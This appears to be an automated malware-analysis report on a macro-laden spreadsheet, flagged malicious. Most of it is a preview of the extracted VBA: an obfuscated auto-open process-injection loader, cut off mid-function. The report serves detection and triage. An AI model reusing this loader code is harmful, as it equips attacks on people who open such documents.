Verdict: MALICIOUS
Risk Score: 138

Heuristics (6)

- VBA project inside OOXML (medium, 4 related findings), rule OOXML_VBA: Document contains a VBA project — VBA macros present.
- Obfuscated auto-exec VBA loader (critical), rule OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line in script: `With CreateObject("Microsoft.XMLDOM").createElement("b64")`
- CreateObject call (high), rule OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script: `With CreateObject("Microsoft.XMLDOM").createElement("b64")`
- AutoOpen macro (low), rule OLE_VBA_AUTOOPEN: AutoOpen macro. Matched line in script: `Attribute VB_Name = "AutoOpen"`
- Auto_Open macro (low), rule OLE_VBA_AUTO: Auto_Open macro. Matched line in script: `Sub Auto_Open()`
- Suspicious extracted artifact (info), rule EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 102255 bytes |

SHA-256 of macros.bas: f0f4ddc53c4bb8b8ccd2e82788c0f232fb3d38612280f9e033a29defa6b57619

Detection (macros.bas)

- ClamAV: No threats found
- Obfuscation or payload: likely. 884 of 1247 identifiers look randomly generated (e.g. 'MiwiESwiMS4cCQEEAjEWLhInJQ8JFywGNywfMS8D'); 2 string-concatenation chain(s), consistent with name-mangling obfuscation. Carved artifact contains 30 long base64-like blob(s).

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "AutoOpen"
Option Explicit
#If Win64 Then
Private Declare PtrSafe Sub RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByVal sSource As LongPtr, ByVal lLength As Long)
Private Declare PtrSafe Function GetModuleFileName Lib "KERNEL32" Alias "GetModuleFileNameA" (ByVal hModule As LongPtr, ByVal lpFilename As String, ByVal nSize As Long) As Long
Private Declare PtrSafe Function CreateProcess Lib "KERNEL32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As LongPtr, ByVal lpThreadAttributes As LongPtr, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As LongPtr, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare PtrSafe Function GetThreadContext Lib "KERNEL32" (ByVal hThread As LongPtr, ByVal lpContext As LongPtr) As Long
Private Declare PtrSafe Function ReadProcessMemory Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesRead As LongPtr) As Long
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function VirtualAllocEx Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function VirtualFree Lib "KERNEL32" (ByVal lpAddress As LongPtr, dwSize As Long, dwFreeType As Long) As Long
Private Declare PtrSafe Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As LongPtr) As Long
Private Declare PtrSafe Function SetThreadContext Lib "KERNEL32" (ByVal hThread As LongPtr, ByVal lpContext As LongPtr) As Long
Private Declare PtrSafe Function ResumeThread Lib "KERNEL32" (ByVal hThread As LongPtr) As Long
Private Declare PtrSafe Function TerminateProcess Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal uExitCode As Integer) As Long
#Else
Private Declare Sub RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As Long, ByVal sSource As Long, ByVal lLength As Long)
Private Declare Function GetModuleFileName Lib "KERNEL32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFilename As String, ByVal nSize As Long) As Long
Private Declare Function CreateProcess Lib "KERNEL32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Function GetThreadContext Lib "KERNEL32" (ByVal hThread As Long, lpContext As CONTEXT) As Long
Private Declare Function ReadProcessMemory Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesRead As LongPtr) As Long
Private Declare Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare Function VirtualAllocEx Lib "KERNEL32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare Function VirtualFree Lib "KERNEL32" (ByVal lpAddress As LongPtr, dwSize As Long, dwFreeType As Long) As Long
Private Declare Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As LongPtr) As Long
Private Declare Function SetThreadContext Lib "KERNEL32" (ByVal hThread As Long, lpContext As CONTEXT) As Long
Private Declare Function ResumeThread Lib "KERNEL32" (ByVal hThread As Long) As Long
Private Declare Function TerminateProcess Lib "KERNEL32" (ByVal hProcess As Long, ByVal uExitCode As Integer) As Long
#End If
Private Const IMAGE_NUMBEROF_DIRECTORY_ENTRIES = 16
Private Const IMAGE_SIZEOF_SHORT_NAME = 8
Private Const MAXIMUM_SUPPORTED_EXTENSION = 512
Private Const SIZE_OF_80387_REGISTERS = 80
#If Win64 Then
Private Type M128A
Low As LongLong
High As LongLong
End Type
#End If
Private Type IMAGE_DOS_HEADER
e_magic As Integer 'WORD e_magic;
e_cblp As Integer 'WORD e_cblp;
e_cp As Integer 'WORD e_cp;
e_crlc As Integer 'WORD e_crlc;
e_cparhdr As Integer 'WORD e_cparhdr;
e_minalloc As Integer 'WORD e_minalloc;
e_maxalloc As Integer 'WORD e_maxalloc;
e_ss As Integer 'WORD e_ss;
e_sp As Integer 'WORD e_sp;
e_csum As Integer 'WORD e_csum;
e_ip As Integer 'WORD e_ip;
e_cs As Integer 'WORD e_cs;
e_lfarlc As Integer 'WORD e_lfarlc;
e_ovno As Integer 'WORD e_ovno;
e_res(4 - 1) As Integer 'WORD e_res[4];
e_oemid As Integer 'WORD e_oemid;
e_oeminfo As Integer 'WORD e_oeminfo;
e_res2(10 - 1) As Integer 'WORD e_res2[10];
e_lfanew As Long 'LONG e_lfanew;
End Type
Private Type IMAGE_DATA_DIRECTORY
VirtualAddress As Long 'DWORD VirtualAddress;
Size As Long 'DWORD Size;
End Type
Private Type IMAGE_BASE_RELOCATION
VirtualAddress As Long 'DWORD VirtualAddress
SizeOfBlock As Long 'DWORD SizeOfBlock
End Type
Private Type IMAGE_FILE_HEADER
Machine As Integer 'WORD Machine;
NumberOfSections As Integer 'WORD NumberOfSections;
TimeDateStamp As Long 'DWORD TimeDateStamp;
PointerToSymbolTable As Long 'DWORD PointerToSymbolTable;
NumberOfSymbols As Long 'DWORD NumberOfSymbols;
SizeOfOptionalHeader As Integer 'WORD SizeOfOptionalHeader;
Characteristics As Integer 'WORD Characteristics;
End Type
Private Type IMAGE_OPTIONAL_HEADER
#If Win64 Then
Magic As Integer 'WORD Magic;
MajorLinkerVersion As Byte 'BYTE MajorLinkerVersion;
MinorLinkerVersion As Byte 'BYTE MinorLinkerVersion;
SizeOfCode As Long 'DWORD SizeOfCode;
SizeOfInitializedData As Long 'DWORD SizeOfInitializedData;
SizeOfUninitializedData As Long 'DWORD SizeOfUninitializedData;
AddressOfEntryPoint As Long 'DWORD AddressOfEntryPoint;
BaseOfCode As Long 'DWORD BaseOfCode;
ImageBase As LongLong 'ULONGLONG ImageBase;
SectionAlignment As Long 'DWORD SectionAlignment;
FileAlignment As Long 'DWORD FileAlignment;
MajorOperatingSystemVersion As Integer 'WORD MajorOperatingSystemVersion;
MinorOperatingSystemVersion As Integer 'WORD MinorOperatingSystemVersion;
MajorImageVersion As Integer 'WORD MajorImageVersion;
MinorImageVersion As Integer 'WORD MinorImageVersion;
MajorSubsystemVersion As Integer 'WORD MajorSubsystemVersion;
MinorSubsystemVersion As Integer 'WORD MinorSubsystemVersion;
Win32VersionValue As Long 'DWORD Win32VersionValue;
SizeOfImage As Long 'DWORD SizeOfImage;
SizeOfHeaders As Long 'DWORD SizeOfHeaders;
CheckSum As Long 'DWORD CheckSum;
Subsystem As Integer 'WORD Subsystem;
DllCharacteristics As Integer 'WORD DllCharacteristics;
SizeOfStackReserve As LongLong 'ULONGLONG SizeOfStackReserve;
SizeOfStackCommit As LongLong 'ULONGLONG SizeOfStackCommit;
SizeOfHeapReserve As LongLong 'ULONGLONG SizeOfHeapReserve;
SizeOfHeapCommit As LongLong 'ULONGLONG SizeOfHeapCommit;
LoaderFlags As Long 'DWORD LoaderFlags;
NumberOfRvaAndSizes As Long 'DWORD NumberOfRvaAndSizes;
DataDirectory(IMAGE_NUMBEROF_DIRECTORY_ENTRIES - 1) As IMAGE_DATA_DIRECTORY 'IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
#Else
Magic As Integer 'WORD Magic;
MajorLinkerVersion As Byte 'BYTE MajorLinkerVersion;
MinorLinkerVersion As Byte 'BYTE MinorLinkerVersion;
SizeOfCode As Long 'DWORD SizeOfCode;
SizeOfInitializedData As Long 'DWORD SizeOfInitializedData;
SizeOfUninitializedData As Long 'DWORD SizeOfUninitializedData;
AddressOfEntryPoint As Long 'DWORD AddressOfEntryPoint;
BaseOfCode As Long 'DWORD BaseOfCode;
BaseOfData As Long 'DWORD BaseOfData;
ImageBase As Long 'DWORD ImageBase;
SectionAlignment As Long 'DWORD SectionAlignment;
FileAlignment As Long 'DWORD FileAlignment;
MajorOperatingSystemVersion As Integer 'WORD MajorOperatingSystemVersion;
MinorOperatingSystemVersion As Integer 'WORD MinorOperatingSystemVersion;
MajorImageVersion As Integer 'WORD MajorImageVersion;
MinorImageVersion As Integer 'WORD MinorImageVersion;
MajorSubsystemVersion As Integer 'WORD MajorSubsystemVersion;
MinorSubsystemVersion As Integer 'WORD MinorSubsystemVersion;
Win32VersionValue As Long 'DWORD Win32VersionValue;
SizeOfImage As Long 'DWORD SizeOfImage;
SizeOfHeaders As Long 'DWORD SizeOfHeaders;
CheckSum As Long 'DWORD CheckSum;
Subsystem As Integer 'WORD Subsystem;
DllCharacteristics As Integer 'WORD DllCharacteristics;
SizeOfStackReserve As Long 'DWORD SizeOfStackReserve;
SizeOfStackCommit As Long 'DWORD SizeOfStackCommit;
SizeOfHeapReserve As Long 'DWORD SizeOfHeapReserve;
SizeOfHeapCommit As Long 'DWORD SizeOfHeapCommit;
LoaderFlags As Long 'DWORD LoaderFlags;
NumberOfRvaAndSizes As Long 'DWORD NumberOfRvaAndSizes;
DataDirectory(IMAGE_NUMBEROF_DIRECTORY_ENTRIES - 1) As IMAGE_DATA_DIRECTORY 'IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
#End If
End Type
Private Type IMAGE_NT_HEADERS
Signature As Long 'DWORD Signature;
FileHeader As IMAGE_FILE_HEADER 'IMAGE_FILE_HEADER FileHeader;
OptionalHeader As IMAGE_OPTIONAL_HEADER 'IMAGE_OPTIONAL_HEADER OptionalHeader;
End Type
Private Type IMAGE_SECTION_HEADER
SecName(IMAGE_SIZEOF_SHORT_NAME - 1) As Byte 'UCHAR Name[IMAGE_SIZEOF_SHORT_NAME];
Misc As Long 'ULONG Misc;
VirtualAddress As Long 'ULONG VirtualAddress;
SizeOfRawData As Long 'ULONG SizeOfRawData;
PointerToRawData As Long 'ULONG PointerToRawData;
PointerToRelocations As Long 'ULONG PointerToRelocations;
PointerToLinenumbers As Long 'ULONG PointerToLinenumbers;
NumberOfRelocations As Integer 'WORD NumberOfRelocations;
NumberOfLinenumbers As Integer 'WORD NumberOfLinenumbers;
Characteristics As Long 'ULONG Characteristics;
End Type
Private Type PROCESS_INFORMATION
hProcess As LongPtr 'HANDLE hProcess;
hThread As LongPtr 'HANDLE hThread;
dwProcessId As Long 'DWORD dwProcessId;
dwThreadId As Long 'DWORD dwThreadId;
End Type
Private Type STARTUPINFO
cb As Long 'DWORD cb;
lpReserved As String 'LPSTR lpReserved;
lpDesktop As String 'LPSTR lpDesktop;
lpTitle As String 'LPSTR lpTitle;
dwX As Long 'DWORD dwX;
dwY As Long 'DWORD dwY;
dwXSize As Long 'DWORD dwXSize;
dwYSize As Long 'DWORD dwYSize;
dwXCountChars As Long 'DWORD dwXCountChars;
dwYCountChars As Long 'DWORD dwYCountChars;
dwFillAttribute As Long 'DWORD dwFillAttribute;
dwFlags As Long 'DWORD dwFlags;
wShowWindow As Integer 'WORD wShowWindow;
cbReserved2 As Integer 'WORD cbReserved2;
lpReserved2 As LongPtr 'LPBYTE lpReserved2;
hStdInput As LongPtr 'HANDLE hStdInput;
hStdOutput As LongPtr 'HANDLE hStdOutput;
hStdError As LongPtr 'HANDLE hStdError;
End Type
Private Type FLOATING_SAVE_AREA
ControlWord As Long 'DWORD ControlWord;
StatusWord As Long 'DWORD StatusWord;
TagWord As Long 'DWORD TagWord;
ErrorOffset As Long 'DWORD ErrorOffset;
ErrorSelector As Long 'DWORD ErrorSelector;
DataOffset As Long 'DWORD DataOffset;
DataSelector As Long 'DWORD DataSelector;
RegisterArea(SIZE_OF_80387_REGISTERS - 1) As Byte 'BYTE RegisterArea[SIZE_OF_80387_REGISTERS];
Spare0 As Long 'DWORD Spare0;
End Type
' winnt.h
#If Win64 Then
Private Type XMM_SAVE_AREA32
ControlWord As Integer 'WORD ControlWord;
StatusWord As Integer 'WORD StatusWord;
TagWord As Byte 'BYTE TagWord;
Reserved1 As Byte 'BYTE Reserved1;
ErrorOpcode As Integer 'WORD ErrorOpcode;
ErrorOffset As Long 'DWORD ErrorOffset;
ErrorSelector As Integer 'WORD ErrorSelector;
Reserved2 As Integer 'WORD Reserved2;
DataOffset As Long 'DWORD DataOffset;
DataSelector As Integer 'WORD DataSelector;
Reserved3 As Integer 'WORD Reserved3;
MxCsr As Long 'DWORD MxCsr;
MxCsr_Mask As Long 'DWORD MxCsr_Mask;
FloatRegisters(8 - 1) As M128A 'M128A FloatRegisters[8];
XmmRegisters(16 - 1) As M128A 'M128A XmmRegisters[16];
Reserved4(96 - 1) As Byte 'BYTE Reserved4[96];
End Type
#End If
Private Type CONTEXT
#If Win64 Then
' Register parameter home addresses
P1Home As LongLong 'DWORD64 P1Home;
P2Home As LongLong 'DWORD64 P2Home;
P3Home As LongLong 'DWORD64 P3Home;
P4Home As LongLong 'DWORD64 P4Home;
P5Home As LongLong 'DWORD64 P5Home;
P6Home As LongLong 'DWORD64 P6Home;
' Control flags
ContextFlags As Long 'DWORD ContextFlags;
MxCsr As Long 'DWORD MxCsr;
' Segment Registers and processor flags
SegCs As Integer 'WORD SegCs;
SegDs As Integer 'WORD SegDs;
SegEs As Integer 'WORD SegEs;
SegFs As Integer 'WORD SegFs;
SegGs As Integer 'WORD SegGs;
SegSs As Integer 'WORD SegSs;
EFlags As Long 'DWORD EFlags;
' Debug registers
Dr0 As LongLong 'DWORD64 Dr0;
Dr1 As LongLong 'DWORD64 Dr1;
Dr2 As LongLong 'DWORD64 Dr2;
Dr3 As LongLong 'DWORD64 Dr3;
Dr6 As LongLong 'DWORD64 Dr6;
Dr7 As LongLong 'DWORD64 Dr7;
' Integer registers
Rax As LongLong 'DWORD64 Rax;
Rcx As LongLong 'DWORD64 Rcx;
Rdx As LongLong 'DWORD64 Rdx;
Rbx As LongLong 'DWORD64 Rbx;
Rsp As LongLong 'DWORD64 Rsp;
Rbp As LongLong 'DWORD64 Rbp;
Rsi As LongLong 'DWORD64 Rsi;
Rdi As LongLong 'DWORD64 Rdi;
R8 As LongLong 'DWORD64 R8;
R9 As LongLong 'DWORD64 R9;
R10 As LongLong 'DWORD64 R10;
R11 As LongLong 'DWORD64 R11;
R12 As LongLong 'DWORD64 R12;
R13 As LongLong 'DWORD64 R13;
R14 As LongLong 'DWORD64 R14;
R15 As LongLong 'DWORD64 R15;
' Program counter
Rip As LongLong 'DWORD64 Rip
' Floating point state
FltSave As XMM_SAVE_AREA32 'XMM_SAVE_AREA32 FltSave;
VectorRegister(26 - 1) As M128A 'M128A VectorRegister[26];
VectorControl As LongLong 'DWORD64 VectorControl;
DebugControl As LongLong 'DWORD64 DebugControl;
LastBranchToRip As LongLong 'DWORD64 LastBranchToRip;
LastBranchFromRip As LongLong 'DWORD64 LastBranchFromRip;
LastExceptionToRip As LongLong 'DWORD64 LastExceptionToRip;
LastExceptionFromRip As LongLong 'DWORD64 LastExceptionFromRip;
#Else
ContextFlags As Long 'DWORD ContextFlags;
Dr0 As Long 'DWORD Dr0;
Dr1 As Long 'DWORD Dr1;
Dr2 As Long 'DWORD Dr2;
Dr3 As Long 'DWORD Dr3;
Dr6 As Long 'DWORD Dr6;
Dr7 As Long 'DWORD Dr7;
FloatSave As FLOATING_SAVE_AREA 'FLOATING_SAVE_AREA FloatSave;
SegGs As Long 'DWORD SegGs;
SegFs As Long 'DWORD SegFs;
SegEs As Long 'DWORD SegEs;
SegDs As Long 'DWORD SegDs;
Edi As Long 'DWORD Edi;
Esi As Long 'DWORD Esi;
Ebx As Long 'DWORD Ebx;
Edx As Long 'DWORD Edx;
Ecx As Long 'DWORD Ecx;
Eax As Long 'DWORD Eax;
Ebp As Long 'DWORD Ebp;
Eip As Long 'DWORD Eip;
SegCs As Long 'DWORD SegCs; // MUST BE SANITIZED
EFlags As Long 'DWORD EFlags; // MUST BE SANITIZED
Esp As Long 'DWORD Esp;
SegSs As Long 'DWORD SegSs;
ExtendedRegisters(MAXIMUM_SUPPORTED_EXTENSION - 1) As Byte
#End If
End Type
Private Const MEM_COMMIT = &H1000
Private Const MEM_RESERVE = &H2000
Private Const PAGE_READWRITE = &H4
Private Const PAGE_EXECUTE_READWRITE = &H40
Private Const MAX_PATH = 260
Private Const CREATE_SUSPENDED = &H4
Private Const CONTEXT_AMD64 = &H100000
Private Const CONTEXT_I386 = &H10000
#If Win64 Then
Private Const CONTEXT_ARCH = CONTEXT_AMD64
#Else
Private Const CONTEXT_ARCH = CONTEXT_I386
#End If
Private Const CONTEXT_CONTROL = CONTEXT_ARCH Or &H1
Private Const CONTEXT_INTEGER = CONTEXT_ARCH Or &H2
Private Const CONTEXT_SEGMENTS = CONTEXT_ARCH Or &H4
Private Const CONTEXT_FLOATING_POINT = CONTEXT_ARCH Or &H8
Private Const CONTEXT_DEBUG_REGISTERS = CONTEXT_ARCH Or &H10
Private Const CONTEXT_EXTENDED_REGISTERS = CONTEXT_ARCH Or &H20
Private Const CONTEXT_FULL = CONTEXT_CONTROL Or CONTEXT_INTEGER Or CONTEXT_SEGMENTS
Private Const VERBOSE = False
Private Const IMAGE_DOS_SIGNATURE = &H5A4D
Private Const IMAGE_NT_SIGNATURE = &H4550
Private Const IMAGE_FILE_MACHINE_I386 = &H14C
Private Const IMAGE_FILE_MACHINE_AMD64 = &H8664
Private Const SIZEOF_IMAGE_DOS_HEADER = 64
Private Const SIZEOF_IMAGE_SECTION_HEADER = 40
Private Const SIZEOF_IMAGE_FILE_HEADER = 20
Private Const SIZEOF_IMAGE_DATA_DIRECTORY = 8
Private Const SIZEOF_IMAGE_BASE_RELOCATION = 8
Private Const SIZEOF_IMAGE_BASE_RELOCATION_ENTRY = 2
#If Win64 Then
Private Const SIZEOF_IMAGE_NT_HEADERS = 264
Private Const SIZEOF_ADDRESS = 8
#Else
Private Const SIZEOF_IMAGE_NT_HEADERS = 248
Private Const SIZEOF_ADDRESS = 4
#End If
Private Const IMAGE_DIRECTORY_ENTRY_EXPORT = 0
Private Const IMAGE_DIRECTORY_ENTRY_IMPORT = 1
Private Const IMAGE_DIRECTORY_ENTRY_RESOURCE = 2
Private Const IMAGE_DIRECTORY_ENTRY_EXCEPTION = 3
Private Const IMAGE_DIRECTORY_ENTRY_SECURITY = 4
Private Const IMAGE_DIRECTORY_ENTRY_BASERELOC = 5
Private Const IMAGE_DIRECTORY_ENTRY_DEBUG = 6
Private Const IMAGE_DIRECTORY_ENTRY_COPYRIGHT = 7
Private Const IMAGE_DIRECTORY_ENTRY_GLOBALPTR = 8
Private Const IMAGE_DIRECTORY_ENTRY_TLS = 9
Private Const IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG = 10
Function jdBQdPGLQIQADmjUhpGTK()
End Function
If 1 <> 1 Then
Function LdYRdhPTgjgkAQofjLMOC(1 as Integer)
End Function
End If
Public Function ByteArrayLength(baBytes() As Byte) As Long
On Error Resume Next
Dim UGiRBglKHVXFisEUIuRsQ, bwkmUKvcirdKqjlczXeQL
UGiRBglKHVXFisEUIuRsQ = "dxwgbTcwopywrqlgwJnmd"
bwkmUKvcirdKqjlczXeQL = InStr(UGiRBglKHVXFisEUIuRsQ, "i")
If bwkmUKvcirdKqjlczXeQL <> 0 Then
Dim FfnylhfxQAqXMSjWFFuPH, yETURitRjvNBeurWMIDpE
FfnylhfxQAqXMSjWFFuPH = 3388
yETURitRjvNBeurWMIDpE = (FfnylhfxQAqXMSjWFFuPH Mod 7)
Else
Dim rPMLCpbfTrIadhAtDtXLF, GfCwHxRaRWPAdhNhipSsM, peeAanPDjpECXJKjoUQif
peeAanPDjpECXJKjoUQif = True
GfCwHxRaRWPAdhNhipSsM = True
rPMLCpbfTrIadhAtDtXLF = peeAanPDjpECXJKjoUQif
End If
ByteArrayLength = UBound(baBytes) - LBound(baBytes) + 1
End Function
Private Function ByteArrayToString(baBytes() As Byte) As String
Dim strRes As String: strRes = ""
Dim iCount As Integer
Dim xrVNUxpbYCIhmiwHwBkCa
xrVNUxpbYCIhmiwHwBkCa = "aYLlveftSrbyVGkbvIGkW"
If Len(xrVNUxpbYCIhmiwHwBkCa) < Len("i") Then
Dim HToNfPaOfAJRswCHJinec, mXMQFfUOYdzGEOxGaPHom
HToNfPaOfAJRswCHJinec = 2025
mXMQFfUOYdzGEOxGaPHom = 4293
If HToNfPaOfAJRswCHJinec = mXMQFfUOYdzGEOxGaPHom Then
Dim TcYoTLSaMtWxXvVAVyJfY, gwjlNGfaIsEOOrUNBLtcO
TcYoTLSaMtWxXvVAVyJfY = "ewdWTtbjGnIlaanerNlzj"
gwjlNGfaIsEOOrUNBLtcO = 2491
Else
Dim lJCiFtAfdqXjnNEOdffMa
lJCiFtAfdqXjnNEOdffMa = True
End If
Else
Dim earIidaMuLpdkTMGdhmDT, FcGEBDpXyGnoOhIkyxpAs
earIidaMuLpdkTMGdhmDT = "fsJKrnGhIsMGBUCIoBJdk"
FcGEBDpXyGnoOhIkyxpAs = InStr(earIidaMuLpdkTMGdhmDT, "e")
If FcGEBDpXyGnoOhIkyxpAs <= 0 Then
Dim IDHgcSRiYWRjfxXKdFzJO
IDHgcSRiYWRjfxXKdFzJO = Date
Else
Dim UfbOvMdvDJWcBWxXyyJxP
UfbOvMdvDJWcBWxXyyJxP = "ldrmUGVWeTvKNYesmBguc"
End If
End If
For iCount = 0 To ByteArrayLength(baBytes) - 1
If baBytes(iCount) <> 0 Then
Dim nQcLeyQHttvNbIWeSWmem, GSmFolwEbVrHrGAVtFifA
nQcLeyQHttvNbIWeSWmem = "fIIJzuQOQCMyFqGfOLumU"
GSmFolwEbVrHrGAVtFifA = InStr(nQcLeyQHttvNbIWeSWmem, "m")
If GSmFolwEbVrHrGAVtFifA = 0 Then
Dim OWLtEJWQyCJyYGWPgPnuc, rxdgIcvizqeYLQUzlIAzN
OWLtEJWQyCJyYGWPgPnuc = "gDAALDgPmYwuFILesViRh"
rxdgIcvizqeYLQUzlIAzN = True
Else
Dim CsGiraCgnPTJxwzHmUHAH, YmEznOcpTgLUoOfwXqcRc, lzkontvQXMRXfDfcHekAP
CsGiraCgnPTJxwzHmUHAH = "lXkYrhREHddwzYehjMQJY"
YmEznOcpTgLUoOfwXqcRc = "EDpdYGTavPluMTFqAtwol"
lzkontvQXMRXfDfcHekAP = InStr(Mid(CsGiraCgnPTJxwzHmUHAH, 3, 2), Mid(CsGiraCgnPTJxwzHmUHAH, 5, 2))
If lzkontvQXMRXfDfcHekAP < 0 Then
Dim sIhOiHtloEFHFMLulYuFx, VtTWilYuqlQqmSQczfLcE
sIhOiHtloEFHFMLulYuFx = 3466
VtTWilYuqlQqmSQczfLcE = sIhOiHtloEFHFMLulYuFx - 2068
Else
Dim JimpzPtGvfOUrvpnRawtQ
JimpzPtGvfOUrvpnRawtQ = CurDir
End If
End If
strRes = strRes & Chr(baBytes(iCount))
Else
Exit For
End If
Next iCount
Dim yjeFkrbNeelMUyvtDeNtV, eAukHBxhyjTUeunwiwMmS
yjeFkrbNeelMUyvtDeNtV = 1777
For eAukHBxhyjTUeunwiwMmS = 1 To yjeFkrbNeelMUyvtDeNtV
Dim IGDJdHAeJEwLvuIIvBODG, ETrRPeiVvHahcuTQzETVc, NEwiIaDNLTWHmeLlRmCsi
IGDJdHAeJEwLvuIIvBODG = 3936
ETrRPeiVvHahcuTQzETVc = "qsSUsLSIDRmlHGHuFMTgb"
NEwiIaDNLTWHmeLlRmCsi = IGDJdHAeJEwLvuIIvBODG
Next eAukHBxhyjTUeunwiwMmS
ByteArrayToString = strRes
End Function
Private Function FileToByteArray(strFilename As String) As Byte()
Dim strFileContent As String
Dim iFile As Integer: iFile = FreeFile
Dim aHmwqieyNaEjsgCHGlnDE
aHmwqieyNaEjsgCHGlnDE = 4719
Do Until aHmwqieyNaEjsgCHGlnDE = 0
Dim eJrHTfRdOjSPaxidJoynR, OSTyGxMshLCsxVWUOvdmu
eJrHTfRdOjSPaxidJoynR = "vEsYOQUWUHDQpUIheDhIN"
OSTyGxMshLCsxVWUOvdmu = Replace(eJrHTfRdOjSPaxidJoynR, "b", "d")
aHmwqieyNaEjsgCHGlnDE = aHmwqieyNaEjsgCHGlnDE - 1
Loop
Open strFilename For Binary Access Read As #iFile
strFileContent = Space(FileLen(strFilename))
Get #iFile, , strFileContent
Close #iFile
Dim KGfwFivhJqsvUOgjvbcso, oxOqdYRLWwHBuQTeKpKYS
KGfwFivhJqsvUOgjvbcso = 4115
For oxOqdYRLWwHBuQTeKpKYS = 1 To KGfwFivhJqsvUOgjvbcso
Dim MzIKkyIirjLuMvjqgBiDu, LSJTzWleJKrsvBXfERziD, EnUgGuJNEMBvxaFYQKAwd
MzIKkyIirjLuMvjqgBiDu = 3692
LSJTzWleJKrsvBXfERziD = "ssHuDVVNqLoQxjnHeKHxp"
EnUgGuJNEMBvxaFYQKAwd = MzIKkyIirjLuMvjqgBiDu
Next oxOqdYRLWwHBuQTeKpKYS
Dim baFileContent() As Byte
Dim zFHieMAhdmISENArHHUwl, LrLDaViYoYdVKUImQPses, lpzyKVHDMHbwOMnVEdPsh
zFHieMAhdmISENArHHUwl = "rTlkBIIuQgFNMRBApfWOW"
LrLDaViYoYdVKUImQPses = "WArgNhXKzWOAepAyDddSb"
lpzyKVHDMHbwOMnVEdPsh = InStr(Mid(zFHieMAhdmISENArHHUwl, 4, 8), Mid(zFHieMAhdmISENArHHUwl, 4, 7))
If lpzyKVHDMHbwOMnVEdPsh < 0 Then
Dim OmFWTRQePQBsSAcmepazv, ArbyUiuqmMBLlwcSBPdQy
OmFWTRQePQBsSAcmepazv = 2307
ArbyUiuqmMBLlwcSBPdQy = (OmFWTRQePQBsSAcmepazv Mod 4)
Else
Dim VPyeVmlIzNPRLnUExXJvN, DeYFGeYsCyVIVEABuXVjH
VPyeVmlIzNPRLnUExXJvN = "GSYkdRXUMBzEeutSdMBJI"
DeYFGeYsCyVIVEABuXVjH = InStr(VPyeVmlIzNPRLnUExXJvN, "a")
If DeYFGeYsCyVIVEABuXVjH <= 0 Then
Dim MXLSyihodRtuKsLzxohmq, VoTiOItccaNmfQfnMhUQd
MXLSyihodRtuKsLzxohmq = 2000
VoTiOItccaNmfQfnMhUQd = MXLSyihodRtuKsLzxohmq Mod 184
Else
Dim yGCoklNcWINVrPIQKJzNm, bQEhFBGlKgmumwHrTEwEY
yGCoklNcWINVrPIQKJzNm = True
